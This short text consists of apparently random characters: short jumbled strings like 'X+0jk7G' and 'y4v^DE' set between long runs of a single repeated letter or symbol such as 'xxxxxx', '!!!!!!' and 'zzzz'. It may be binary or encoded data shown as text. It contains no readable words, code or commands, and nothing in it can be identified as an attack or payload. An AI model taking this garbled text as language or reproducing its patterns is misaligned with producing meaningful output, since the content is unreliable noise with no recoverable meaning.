X+0jk7G xh:Vz: @>Xim6 x",Pqs x`{T`c| xxxxxx XXXXXXXXXXXX xxxxxxxxxxxxxxxxxxxxx ;;;;;XXXXXXXXXXXXXXXXXXXXX''''''''''''' XXXXXXXXXXXXXXXXXXXXXXXXX @@XY^|` y4v^DE y8ZC\# `Y#+Ee y>KF$k [Yn\w2E & yR;Xm YYYYYYY !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY `z7*@`s z9YDF|J .Zg3t ?ZgMf1 z_?GQ-b z.@`Nv0 %zT-*Lh zZd^4/ zzzzzzzzzzzzzzzzzzz